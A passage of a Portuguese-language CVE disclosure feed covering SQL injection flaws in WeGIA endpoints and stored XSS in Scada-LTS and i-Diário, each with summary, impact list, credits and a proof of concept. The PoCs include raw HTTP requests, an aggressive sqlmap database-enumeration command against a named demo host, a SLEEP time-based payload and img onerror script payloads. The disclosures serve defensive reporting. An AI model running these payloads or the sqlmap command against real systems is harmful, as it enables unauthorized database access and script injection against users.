</span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> nome=Maria&sobrenomeForm=Silva&gender=f&telefone=%2821%2998652-3758&nascimento=1996-04-04&nome_pai=teste&nome_mae=teste </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Então, use o <code>sqlmap</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-54060/image.png" width="867" height="782" srcset="/p/cve-2025-54060/image_hu_1d34c10199db05d0.png 480w, /p/cve-2025-54060/image_hu_ce851de59c9a32ae.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="110" data-flex-basis="266px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mw78-c4f6-2hq7</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54061/ https://www.cvehunters.com/pt/p/cve-2025-54061/ <h2 id="cve-2025-54061-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editardocphp">CVE-2025-54061: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>idatendido_familiares</code> do Endpoint <code>dependente_editarDoc.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54061" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54061</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>idatendido_familiares</code> do endpoint <code>/html/funcionario/dependente_editarDoc.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>idatendido_familiares</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-54061-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editardocphp">CVE-2025-54061: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>idatendido_familiares</code> do Endpoint <code>dependente_editarDoc.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54061" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54061</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>idatendido_familiares</code> do endpoint <code>/html/funcionario/dependente_editarDoc.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>idatendido_familiares</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/html/funcionario/dependente_editarDoc.php</code></p> <p>Parâmetro: <code>idatendido_familiares</code></p> <p style="text-align: justify;">Salve a requisição no arquivo <code>req.txt</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> POST /html/funcionario/dependente_editarDoc.php?id_pessoa=3&idatendido_familiares=1 HTTP/1.1 </span></span><span class="line"><span class="cl"> Host: demo.wegia.org </span></span><span class="line"><span class="cl"> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl"> Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl"> Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl"> Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl"> Content-Length: 82 </span></span><span class="line"><span class="cl"> Origin: https://demo.wegia.org </span></span><span class="line"><span class="cl"> Connection: keep-alive </span></span><span class="line"><span class="cl"> Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1 </span></span><span class="line"><span class="cl"> Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g0$t1751259204$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270 </span></span><span class="line"><span class="cl"> Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl"> Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl"> Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl"> Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl"> Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl"> Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> rg=56.242.1&orgao_emissor=Uni%C3%A3o1&data_expedicao=2005-06-06&cpf=495.852.710-95 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Então, use o <code>sqlmap</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-54061/image.png" width="862" height="755" srcset="/p/cve-2025-54061/image_hu_fe6010bc9adac3a1.png 480w, /p/cve-2025-54061/image_hu_b23a08e91a8f8039.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="274px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54062/ https://www.cvehunters.com/pt/p/cve-2025-54062/ <h2 id="cve-2025-54062-vulnerabilidade-de-injeção-sql-no-parâmetro-id_dependente-do-endpoint-profile_dependentephp">CVE-2025-54062: Vulnerabilidade de Injeção SQL no parâmetro <code>id_dependente</code> do Endpoint <code>profile_dependente.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54062" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54062</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_dependente</code> do endpoint <code>/html/funcionario/profile_dependente.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id_dependente</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-54062-vulnerabilidade-de-injeção-sql-no-parâmetro-id_dependente-do-endpoint-profile_dependentephp">CVE-2025-54062: Vulnerabilidade de Injeção SQL no parâmetro <code>id_dependente</code> do Endpoint <code>profile_dependente.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54062" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54062</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_dependente</code> do endpoint <code>/html/funcionario/profile_dependente.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id_dependente</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/html/funcionario/profile_dependente.php</code></p> <p>Parâmetro: <code>id_dependente</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> +AND+SLEEP(10) </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-54062/image.png" width="1313" height="775" srcset="/p/cve-2025-54062/image_hu_d68ef2828ab64648.png 480w, /p/cve-2025-54062/image_hu_73d0afd25a2a62ee.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="169" data-flex-basis="406px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7728/ https://www.cvehunters.com/pt/p/cve-2025-7728/ <h2 id="cve-2025-7728-cross-site-scripting-xss-armazenado-no-endpoint-usersshtm-parâmetro-username">CVE-2025-7728: Cross-Site Scripting (XSS) Armazenado no endpoint <code>users.shtm</code> parâmetro <code>username</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7728" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7728</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>users.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>username</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>users.shtm</code></p><h2 id="cve-2025-7728-cross-site-scripting-xss-armazenado-no-endpoint-usersshtm-parâmetro-username">CVE-2025-7728: Cross-Site Scripting (XSS) Armazenado no endpoint <code>users.shtm</code> parâmetro <code>username</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7728" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7728</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>users.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>username</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>users.shtm</code></p> <p>Parâmetro: <code>username</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>username</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Registre o payload no campo <code>username</code> no endpoint <code>users.shtm</code>. Depois disso, o XSS pode ser acionado abrindo a página <code>users.shtm</code>.</p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7728/image.png" width="845" height="719" srcset="/p/cve-2025-7728/image_hu_2812788e7819ccd3.png 480w, /p/cve-2025-7728/image_hu_9abb080d9b9ab836.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="117" data-flex-basis="282px" /></p> <p><img src="/p/cve-2025-7728/image-1.png" width="1011" height="549" srcset="/p/cve-2025-7728/image-1_hu_38f8c9818a1d9d3b.png 480w, /p/cve-2025-7728/image-1_hu_5a50be6addac808c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="184" data-flex-basis="441px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7729/ https://www.cvehunters.com/pt/p/cve-2025-7729/ <h2 id="cve-2025-7729-cross-site-scripting-xss-armazenado-no-endpoint-usersprofilesshtm-parâmetro-userprofilename">CVE-2025-7729: Cross-Site Scripting (XSS) Armazenado no endpoint <code>usersProfiles.shtm</code> parâmetro <code>userprofilename</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7729" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7729</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>usersProfiles.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>userprofilename</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>usersProfiles.shtm</code></p><h2 id="cve-2025-7729-cross-site-scripting-xss-armazenado-no-endpoint-usersprofilesshtm-parâmetro-userprofilename">CVE-2025-7729: Cross-Site Scripting (XSS) Armazenado no endpoint <code>usersProfiles.shtm</code> parâmetro <code>userprofilename</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7729" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7729</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>usersProfiles.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>userprofilename</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>usersProfiles.shtm</code></p> <p>Parâmetro: <code>userprofilename</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>userprofilename</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7729/image.png" width="1013" height="541" srcset="/p/cve-2025-7729/image_hu_e21d105baa8d5ea3.png 480w, /p/cve-2025-7729/image_hu_770ae5c8de58bd9d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7729/image-1.png" width="1011" height="537" srcset="/p/cve-2025-7729/image-1_hu_5d649151d977a0d6.png 480w, /p/cve-2025-7729/image-1_hu_87877a04570b6134.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="188" data-flex-basis="451px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7872/ https://www.cvehunters.com/pt/p/cve-2025-7872/ <h2 id="cve-2025-7872-cross-site-scripting-xss-armazenado-no-endpoint-justificativas-de-falta-parâmetro-justificativa">CVE-2025-7872: Cross-Site Scripting (XSS) Armazenado no endpoint <code>justificativas-de-falta</code> parâmetro <code>Justificativa</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7872" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7872</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>justificativas-de-falta</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Justificativa</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>justificativas-de-falta</code></p><h2 id="cve-2025-7872-cross-site-scripting-xss-armazenado-no-endpoint-justificativas-de-falta-parâmetro-justificativa">CVE-2025-7872: Cross-Site Scripting (XSS) Armazenado no endpoint <code>justificativas-de-falta</code> parâmetro <code>Justificativa</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7872" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7872</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>justificativas-de-falta</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Justificativa</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>justificativas-de-falta</code></p> <p>Parâmetro: <code>Justificativa</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Justificativa</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC3'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7872/image.png" width="972" height="892" srcset="/p/cve-2025-7872/image_hu_b4847f334cbf63a8.png 480w, /p/cve-2025-7872/image_hu_711c4335047c53ed.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="108" data-flex-basis="261px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu 